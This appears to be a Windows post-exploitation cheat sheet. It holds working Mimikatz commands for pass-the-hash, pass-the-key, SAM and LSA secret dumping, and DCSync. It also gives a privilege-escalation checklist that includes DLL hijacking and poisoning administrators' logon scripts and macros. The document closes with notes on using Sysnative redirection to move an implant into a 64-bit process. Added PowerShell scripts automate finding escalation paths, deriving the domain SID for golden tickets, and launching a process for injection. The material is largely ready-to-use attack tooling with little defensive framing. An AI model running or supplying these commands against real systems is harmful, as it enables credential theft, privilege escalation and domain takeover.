Table Of Contents

  • Post Exploitation
    • Mimikatz Credential Manipulation
    • Windows Privilege Escalation Checklist
    • File System Redirection

POST EXPLOITATION

  • Note: This section details various post exploitation tools and techniques such as mimikatz, PsExec, privilege escalation tactics, file system redirection, etc.

MIMIKATZ CREDENTIAL MANIPULATION

Mimikatz pass-the-hash (launches the specified binary in a new logon session whose NTLM credential is the supplied hash; anything that process then authenticates to over NTLM or Kerberos uses that hash). Because it patches LSASS it needs SeDebugPrivilege (local administrator plus privilege::debug) or SYSTEM.

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:<USERNAME> /domain:<DOMAIN> /ntlm:<NTLM_HASH> /run:<FILE_PATH>" exit

Mimikatz hashdump of the local SAM (NTLM hashes of local accounts). Must be run as SYSTEM; from an elevated administrator shell, token::elevate impersonates SYSTEM first.

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit

Overpass-the-hash with AES128/AES256 Kerberos keys (pass-the-key). The AES keys can be obtained via DCSync, or with sekurlsa::ekeys on a host where the user has logged on. Supplying them alongside the NTLM hash makes the resulting Kerberos traffic use AES instead of RC4, which blends in better on domains that have RC4 disabled or alerted on.

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:<USERNAME> /domain:<DOMAIN> /ntlm:<NTLM_HASH> /aes128:<AES128_KEY> /aes256:<AES256_KEY> /run:<FILE_PATH>" exit

Extract the domain SID from an Active Directory object (wmic is deprecated on current Windows builds but still present on most targets)

wmic group where name="Domain Admins" get name,sid,domain
:: or reg query HKU to list the SIDs of logged-on users whose hives are loaded (each contains the domain SID)
:: Result of the wmic command (Domain Admins always has RID 512): S-1-5-21-520640528-869697576-4233872597-512
:: A logged-on user's SID from HKU ends in that user's RID instead, e.g. S-1-5-21-520640528-869697576-4233872597-1532
:: Either way the domain SID is everything before the final hyphen: S-1-5-21-520640528-869697576-4233872597
:: Caveat for the HKU route: HKU also holds well-known SIDs (S-1-5-18/19/20) and local accounts, whose S-1-5-21 prefix is the machine SID, not the domain SID
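The two routes above, done from PowerShell without wmic. This is an added example, not part of the original notes: it resolves a domain group to its SID and reads the SIDs of loaded hives under HKEY_USERS, and lets .NET's SecurityIdentifier split off the RID instead of parsing the string by hand. The function names are this example's own, and it assumes a domain-joined host for the group lookup.

```powershell
# Added example (not from the original notes): derive the domain SID two ways without wmic.

function Get-DomainSidFromGroup {
    param([string]$GroupName = 'Domain Admins')
    # Translate the group name to a SID; returns $null on a host that is not domain-joined.
    try {
        $account = New-Object System.Security.Principal.NTAccount($GroupName)
        $sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
    } catch {
        return $null
    }
    [PSCustomObject]@{
        GroupSid  = $sid.Value                   # ends in -512 for Domain Admins
        DomainSid = $sid.AccountDomainSid.Value  # RID stripped by .NET, no string slicing
    }
}

function Get-AccountDomainSidsFromHives {
    # Every subkey of HKEY_USERS is the SID of a loaded user hive (plus a *_Classes copy of each).
    # AccountDomainSid is $null for well-known SIDs such as S-1-5-18 (SYSTEM), which filters them out.
    # Caveat: local accounts are also S-1-5-21-... but carry the machine SID, not the domain SID.
    $seen = @{}
    Get-ChildItem -Path 'Registry::HKEY_USERS' | ForEach-Object {
        $name = $_.PSChildName -replace '_Classes$', ''
        try { $sid = New-Object System.Security.Principal.SecurityIdentifier($name) } catch { return }
        if ($sid.AccountDomainSid) { $seen[$sid.AccountDomainSid.Value] = $true }
    }
    return @($seen.Keys)
}

$fromGroup = Get-DomainSidFromGroup
$fromHives = Get-AccountDomainSidsFromHives
Write-Output "Domain SID via group lookup: $($fromGroup.DomainSid)"
foreach ($s in $fromHives) {
    # Anything that does not match the group-derived SID is a machine SID (local account), not the domain.
    $label = if ($fromGroup -and $s -eq $fromGroup.DomainSid) { 'domain' } else { 'machine/other' }
    Write-Output "Loaded hive SID prefix: $s ($label)"
}
```

If the group lookup fails (non-domain host, or name resolution blocked) the hive route still works, but then every S-1-5-21 prefix it prints has to be checked against a known domain account before it is used for a golden ticket or similar.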

Remote hash dump of a specific account via DCSync (asks a domain controller to replicate that account's secrets over the directory replication service, so nothing runs on the DC). This works for any principal holding the Replicating Directory Changes and Replicating Directory Changes All rights on the domain object; by default that is Administrators, Domain Admins, Enterprise Admins, and the Domain Controllers group.

mimikatz.exe "lsadump::dcsync /domain:<DOMAIN_FQDN> /user:<USERNAME>" exit

Dump LSA secrets (service account passwords, the DPAPI system key, cached machine secrets, etc.). Mimikatz reads the SysKey (boot key) from the SYSTEM hive and uses it to decrypt the SECRETS entries in the SECURITY hive. Against the live registry this needs SYSTEM (token::elevate); against copied hive files add /system:<SYSTEM_HIVE> /security:<SECURITY_HIVE>.

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" exit

WINDOWS PRIVILEGE ESCALATION CHECKLIST

  • More info at: https://github.com/GhostPack/SharpUp

  • Step-1: Enumerate all file servers in the domain and run net view against each to find open shares.

    • Once all shares are located, enumerate the files and folders on each share for sensitive data such as administrative documentation, credentials, user home directories, etc.
    • Repeat against other systems in the domain (other server roles such as database, web, etc.), which may have misconfigured network shares exposing sensitive data.
  • Step-2: Enumerate the system PATH for directories the current user can write to, then attempt a DLL hijack (classic targets: wlbsctrl.dll, loaded by the IKEEXT service on older builds, or the scheduler) if a privileged service loads a missing DLL from one of them.

  • Step-3: Run the open-source tool SharpUp to enumerate potential privilege escalation opportunities such as writable PATH directories, weak service permissions, modifiable service binaries, and more.

  • Step-4: Enumerate the startup folders, user scheduled tasks, etc. Attempt to poison globally shared scripts that run at logon.

  • Step-5: Gain access to administrative shares and attempt to poison scripts run by administrators, or macro-enabled Office files they open.
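A first pass over steps 2 and 4 of the checklist, as an added example that is not part of the original notes or of SharpUp. It reports directories on the machine PATH the current user can write to (what a missing-DLL hijack needs), whether the wlbsctrl.dll / IKEEXT preconditions hold, which startup folders are writable, and which scheduled tasks run an executable from a directory you can write to. Function names are this example's own; it assumes an unprivileged PowerShell session on the target and Windows 8 / Server 2012 or later for Get-ScheduledTask.

```powershell
# Added example (not from the original notes): quick enumeration for checklist steps 2 and 4.

function Test-Writable {
    param([string]$Path)
    # Prove write access by creating and deleting a uniquely named file. This is more reliable than
    # reading ACLs because it evaluates inherited and group-based rights exactly as the OS does.
    $probe = Join-Path $Path ("probe_{0}.tmp" -f ([Guid]::NewGuid().ToString('N')))
    try {
        [IO.File]::WriteAllText($probe, 'x')
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Get-PathDirs {
    # Machine-wide PATH only: per-user PATH entries are not searched by services running as SYSTEM.
    [Environment]::GetEnvironmentVariable('PATH', 'Machine') -split ';' |
        ForEach-Object { $_.Trim() } |
        Where-Object { $_ -and (Test-Path -LiteralPath $_ -PathType Container) } |
        Select-Object -Unique
}

function Find-WritablePathDirs {
    Get-PathDirs | Where-Object { Test-Writable $_ }
}

function Test-WlbsctrlHijackPreconditions {
    # IKEEXT historically tried to load wlbsctrl.dll, which is absent unless Network Load Balancing is
    # installed. Whether a given Windows build still attempts the load must be confirmed with Process
    # Monitor; this only checks that the DLL is missing, the service exists, and a PATH dir is writable.
    $svc = Get-Service -Name IKEEXT -ErrorAction SilentlyContinue
    $present = @(Get-PathDirs) + (Join-Path $env:SystemRoot 'System32') |
        Where-Object { Test-Path -LiteralPath (Join-Path $_ 'wlbsctrl.dll') }
    [PSCustomObject]@{
        ServiceExists    = [bool]$svc
        StartType        = if ($svc) { $svc.StartType } else { $null }  # StartType needs PS 5 / .NET 4.6.1+
        DllAlreadyExists = [bool]$present
        WritablePathDirs = @(Find-WritablePathDirs)
    }
}

function Find-StartupFolders {
    # Per-machine startup folder runs for every user who logs on; per-user runs for the current user only.
    foreach ($name in 'CommonStartup', 'Startup') {
        $dir = [Environment]::GetFolderPath($name)
        if ($dir -and (Test-Path -LiteralPath $dir)) {
            [PSCustomObject]@{
                Folder   = $dir
                Writable = Test-Writable $dir
                Entries  = @(Get-ChildItem -LiteralPath $dir -Force -ErrorAction SilentlyContinue |
                             Select-Object -ExpandProperty Name)
            }
        }
    }
}

function Find-TasksWithWritableBinaryDirs {
    # A task whose executable sits in a directory you can write to is a candidate for binary replacement
    # or DLL sideloading; the principal tells you what you would gain (SYSTEM, another user, or nothing).
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if (-not [IO.Path]::IsPathRooted($exe)) { continue }   # bare names resolve via PATH, covered above
            $dir = Split-Path -Path $exe -Parent
            if ($dir -and (Test-Path -LiteralPath $dir) -and (Test-Writable $dir)) {
                [PSCustomObject]@{
                    Task        = $task.TaskPath + $task.TaskName
                    RunsAs      = $task.Principal.UserId
                    RunLevel    = $task.Principal.RunLevel
                    Exe         = $exe
                    WritableDir = $dir
                }
            }
        }
    }
}

Write-Output '== Writable machine PATH directories =='; Find-WritablePathDirs
Write-Output '== wlbsctrl.dll / IKEEXT preconditions =='; Test-WlbsctrlHijackPreconditions
Write-Output '== Startup folders =='; Find-StartupFolders | Format-List
Write-Output '== Scheduled tasks with writable binary directories =='; Find-TasksWithWritableBinaryDirs | Format-Table -AutoSize
```

Treat every hit as a lead, not a result: a writable PATH directory only matters if some privileged process actually searches it for a DLL that is missing, and a writable task directory only matters if the task runs as someone other than you.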

FILE SYSTEM REDIRECTION

  • Notes:
    • WOW64 file system redirection: a 32-bit (x86) process that references C:\Windows\System32 is transparently redirected to C:\Windows\SysWOW64. The virtual directory C:\Windows\Sysnative bypasses the redirection, which is how an x86 implant launches a native x64 process to migrate into.
    • Execute an x64 binary from the x86 process: C:\Windows\Sysnative\upnpcont.exe
    • Use tasklist to list processes and find the PID of the process that was just launched
      tasklist /v | findstr upnpcont
    • Inject into the PID discovered in the previous step (using the injection capability of whatever implant or C2 is in use)
    • Exit the original x86 process
    • Caveat: Sysnative exists only as seen from a 32-bit process on 64-bit Windows; from a 64-bit process, or on 32-bit Windows, use System32 directly.
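The launch step above, done from PowerShell, as an added example that is not part of the original notes. It picks Sysnative only when the current process is actually running under WOW64, so the same script works from a 64-bit shell or on 32-bit Windows, and it gets the new PID from Start-Process instead of grepping tasklist output (which can match several processes). Function and parameter names are this example's own; the injection itself is left to the implant.

```powershell
# Added example (not from the original notes): start a native-bitness process from an x86 context
# and return its PID for the injection step.

function Start-NativeProcess {
    param([string]$ExeName = 'upnpcont.exe')   # the host process chosen in the notes above
    $windir = $env:SystemRoot
    if ([Environment]::Is64BitProcess -or -not [Environment]::Is64BitOperatingSystem) {
        # Already native, or no WOW64 layer exists: System32 is the real System32.
        $exe = Join-Path $windir ('System32\' + $ExeName)
    } else {
        # 32-bit process on 64-bit Windows: System32 would be redirected to SysWOW64, so use Sysnative.
        $exe = Join-Path $windir ('Sysnative\' + $ExeName)
    }
    if (-not (Test-Path -LiteralPath $exe)) { throw "Binary not found: $exe" }

    # -PassThru returns the Process object, so the PID is known without tasklist/findstr.
    $proc = Start-Process -FilePath $exe -PassThru -WindowStyle Hidden
    [PSCustomObject]@{
        Pid           = $proc.Id
        Path          = $exe
        LauncherIs64  = [Environment]::Is64BitProcess
    }
}

$target = Start-NativeProcess
Write-Output "Launched $($target.Path) as PID $($target.Pid) (launcher 64-bit: $($target.LauncherIs64))"
# Hand $target.Pid to the implant's inject command, then exit this x86 process as the notes say.
```

After injecting, confirm the new process really is 64-bit before tearing down the x86 one; a wrong-bitness host that later exits takes the implant with it.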